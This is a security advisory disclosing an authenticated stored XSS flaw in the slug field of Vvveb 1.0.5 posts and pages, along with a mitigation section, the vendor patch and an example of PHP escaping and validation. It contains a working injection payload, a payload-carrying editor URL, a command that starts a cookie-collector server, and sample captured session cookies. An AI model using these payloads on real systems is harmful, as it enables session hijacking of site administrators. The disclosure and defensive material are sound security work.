Vvveb 1.0.5 | Authenticated Stored XSS on creating posts & pages

Basic Information

Software Type: Web App
Software Name: Vvveb
Affected Version: 1.0.5
Software Vendor: Vvveb
Software Link: https://github.com/givanz/Vvveb
Severity: High
CVSS Score: 8.0
Affected Assets: 100+
Date of Discovery: Jan 3rd, 2025

Description

The endpoints [/vadmin123/index.php?module=content/post&type=post] and [/vadmin123/index.php?module=content/posts&type=page] are vulnerable to stored XSS: an attacker can inject arbitrary HTML through the slug parameter of a post or page.
The stored payload fires whenever the post/page is opened for editing or loaded in the drag-and-drop designer.

Both endpoints are accessible to the editor role, so a low-privileged editor can plant a payload that runs in the browser of any other editor, admin or super admin who opens the post, and use it to steal their cookies.

Reproduce

To reproduce the issue, navigate to any of these endpoints to view posts or pages:
http://127.0.0.1/vadmin123/index.php?module=content/posts&type=post
http://127.0.0.1/vadmin123/index.php?module=content/posts&type=page

Open a post or a page for editing (the two flows are nearly identical):
http://127.0.0.1/vadmin123/index.php?module=content/post&post_id=6&type=post
http://127.0.0.1/vadmin123/index.php?module=content/post&post_id=14&type=page


Enter the following payload in the slug field and save:

"><img src='http://127.0.0.1:1718/capture.php'>
Once the page reloads, the payload executes. It also fires whenever another moderator or admin clicks the post or page in the listing, because clicking opens it directly in edit mode:
http://127.0.0.1/vadmin123/index.php?module=content/post&post_id=6&type=post


It also fires when the post is opened in the drag-and-drop editor:
http://127.0.0.1/vadmin123/?module=editor/editor&name=Mauris+viverra+cursus+ante+laoreet+eleifend&url=//127.0.0.1/%22%3E%3Cimg%20src=%27http://127.0.0.1:1718/capture.php%27%3E&template=content/post.html


It can also be triggered by opening the post in the drag-and-drop editor by name alone, without the url parameter:
http://127.0.0.1/vadmin123/?module=editor/editor&name=Mauris+viverra+cursus+ante+laoreet+eleifend
This variant is useful to an attacker because the URL gives no hint of the payload, yet the stored slug is still rendered and executed.

Cookie stealing
To collect the cookies, I created the following PHP script:
https://gist.github.com/0xHamy/b2674eeffd1f73af96d29f152c47bcbd


Save this as capture.php and start PHP's built-in web server in the same directory with the following command:
> php -S 0.0.0.0:1718

The script appends the received cookies to a file named cookie_log.txt, each entry prefixed with a timestamp:
[2025-01-03 18:09:17] Cookies: _ga_90PNJH7CQ5=GS1.1.1735826854.1.1.1735826858.0.0.0; _ga=GA1.1.305814098.1735826855; PHPSESSID=EzuO8BB8K7BLfydEIx%2C1De1mJA3ONYvZBOIhjeXt-syZFn0%2C; user=1

The captured cookies can then be replayed to take over the admin's or another moderator's session.

Note that the cookies reach capture.php in this setup because the collector runs on the same host (127.0.0.1) as the target and browsers do not isolate cookies by port (RFC 6265 section 8.5), so the plain <img> request carries PHPSESSID regardless of its HttpOnly flag. Against a collector on a different origin an <img> request sends no victim cookies; the attacker would then need JavaScript execution from the injection point to read document.cookie, which an HttpOnly session cookie would prevent.

Proof of Concept (PoC) Video

PoC Exploit

https://gist.github.com/0xHamy/b2674eeffd1f73af96d29f152c47bcbd

Mitigation

Validate the slug on save against an allow-list (lowercase letters, digits and hyphens) and HTML-escape every user-controlled field at the point where it is rendered, in the post/page editor as well as the drag-and-drop editor. Marking the session cookie HttpOnly does not stop the injection but removes document.cookie as an exfiltration target.

Patch

Vvveb added escaping (htmlspecialchars) for all content fields such as the slug and name of posts and pages, both on the post/page edit screen and in the editor's file manager list.
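As an added illustration for the mitigation and patch sections (this is example code written for this page, not Vvveb's code and not the linked gist), the following PHP renders the slug into an input attribute the way a vulnerable template would, next to the htmlspecialchars escaping the patch describes, and adds the allow-list check suggested under Mitigation. The function names, the template fragment and the sample slug are assumptions.

```php
<?php
declare(strict_types=1);

// Added example, not Vvveb's code: the slug rendered into an <input value="...">
// attribute the way a 1.0.5-style template would, beside the escaped version the
// patch describes, plus an allow-list check. Function names are assumptions.

// Constructed input: the slug as saved by the payload in the advisory.
const PAYLOAD_SLUG = "\"><img src='http://127.0.0.1:1718/capture.php'>";

// Vulnerable pattern: the stored slug is concatenated raw into the attribute.
// The leading "> terminates value="..." and the <input> tag, so the <img>
// that follows is parsed as live markup and its request fires on page load.
function renderSlugFieldVulnerable(string $slug): string
{
    return '<input type="text" name="slug" value="' . $slug . '">';
}

// Output encoding for an HTML attribute context. ENT_QUOTES is given explicitly:
// before PHP 8.1 the default flags (ENT_COMPAT) leave the single quote alone,
// which is not enough if a template ever puts the value in a single-quoted
// attribute. ENT_SUBSTITUTE keeps invalid UTF-8 from silently emptying the output.
function e(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function renderSlugFieldSafe(string $slug): string
{
    return '<input type="text" name="slug" value="' . e($slug) . '">';
}

// Input validation as a second layer on save: a URL slug needs nothing beyond
// lowercase letters, digits and single hyphens. Reject instead of stripping,
// so an injection attempt fails loudly rather than being quietly "cleaned".
function isValidSlug(string $slug): bool
{
    return strlen($slug) <= 200
        && preg_match('/\A[a-z0-9]+(?:-[a-z0-9]+)*\z/', $slug) === 1;
}

// Compare the two renderings and the validator's verdicts.
echo 'Vulnerable: ', renderSlugFieldVulnerable(PAYLOAD_SLUG), PHP_EOL;
echo 'Escaped:    ', renderSlugFieldSafe(PAYLOAD_SLUG), PHP_EOL;
foreach ([PAYLOAD_SLUG, 'mauris-viverra-cursus-ante'] as $slug) {
    printf("isValidSlug(%s) => %s\n", var_export($slug, true), isValidSlug($slug) ? 'true' : 'false');
}
```

Run it with the php CLI: the first rendering shows the attribute boundary broken by the payload, the second shows the quotes and angle brackets turned into entities so the slug stays inside value="...". Because the escaping is applied at output time, it has to be repeated at every place the slug is rendered, including the drag-and-drop editor and the file manager list the patch mentions; the allow-list check on save is the defence-in-depth layer for any render path that gets missed.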



Posted on: January 10, 2025 10:36 PM